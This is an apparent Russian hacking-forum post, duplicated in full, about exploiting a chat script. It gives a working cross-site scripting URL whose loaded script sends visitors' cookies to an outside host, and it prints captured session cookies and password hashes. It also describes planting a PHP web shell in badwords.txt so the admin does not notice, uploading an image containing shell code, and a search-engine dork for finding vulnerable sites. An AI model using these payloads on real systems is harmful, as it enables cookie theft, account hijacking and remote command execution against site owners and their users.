TANZWUT
31.10.2006, 11:53
решил поковыряца, под руками была только версия 3,3, думаю слипу интересно будет
http://localhost/chat/info.php?reason=<script%20src=http://localhost/s.js></script>
s.js
img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;
REFERER=http://localhost/chat/info.php?reason=%3C%73%63%72%69%70%74%20%73%72%63% 3D%68%74%74%70%3A%2F%2F%6C%6F%63%61%6C%68%6F%73%74 %2F%73%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E
QUERY=blab_id=1-bb2e48de1ba9a89497564acb9b584cc4; blab_pass=813dfe9bd7b89fbcc5fd29d2be091bac; blab_lang=9; blab_time=3
AGENT=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; x64; SV1)
+ с правами админа можно сдампить БД юзеров,
при наличии локального инклуда на сайте
в badwords.txt можно безпалевно вписать
<?php system($_GET[cmd]); ?> - админ этого неувидит, а так же с обычными правами можно загрузить картинку с шелл кодом.
гугл inurl:"info.php?reason=link"
http://localhost/chat/info.php?reason=<script%20src=http://localhost/s.js></script>
s.js
img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;
REFERER=http://localhost/chat/info.php?reason=%3C%73%63%72%69%70%74%20%73%72%63% 3D%68%74%74%70%3A%2F%2F%6C%6F%63%61%6C%68%6F%73%74 %2F%73%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E
QUERY=blab_id=1-bb2e48de1ba9a89497564acb9b584cc4; blab_pass=813dfe9bd7b89fbcc5fd29d2be091bac; blab_lang=9; blab_time=3
AGENT=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; x64; SV1)
+ с правами админа можно сдампить БД юзеров,
при наличии локального инклуда на сайте
в badwords.txt можно безпалевно вписать
<?php system($_GET[cmd]); ?> - админ этого неувидит, а так же с обычными правами можно загрузить картинку с шелл кодом.
гугл inurl:"info.php?reason=link"